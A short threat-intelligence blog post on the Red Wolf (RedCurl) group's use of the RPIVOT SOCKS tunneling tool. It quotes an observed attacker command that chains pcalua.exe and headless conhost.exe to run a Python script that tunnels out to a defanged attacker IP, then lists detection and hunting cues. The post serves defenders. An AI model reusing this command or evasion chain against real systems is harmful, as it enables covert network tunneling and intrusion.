011. Red Wolf Toolset Update

Hello everyone! Adversary toolset is always evolving, and today we'll look at another example demonstrating it.

Recently Huntress published a report on Red Wolf (also known as RedCurl and Earth Kapre) attacks against several organizations in Canada. The report includes information on a tool we haven't observed to be used by this activity cluster. I'm talking about RPIVOT - tool written in Python for SOCKS tunneling.

To execute the tool, the adversary used the following command:

pcalua.exe -a conhost.exe -c --headless C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310

As you can see, we have lots of detection and hunting opportunities:

• The threat actors abused pcalua.exe using -a parameter for proxy execution.
• They also leveraged conhost.exe with -c and --headless parameters to hide child process window.
• The adversary used python.exe to execute a script from suspicious folder - a good hunting candidate.
• Finally, RPIVOT has lots of command line parameters, which can be used for building detections: --s, --server-ip, --p, --server-port, etc.

Threat actors often update their toolset to bypass you security controls, so make sure you test your detections often enough!

See you tomorrow!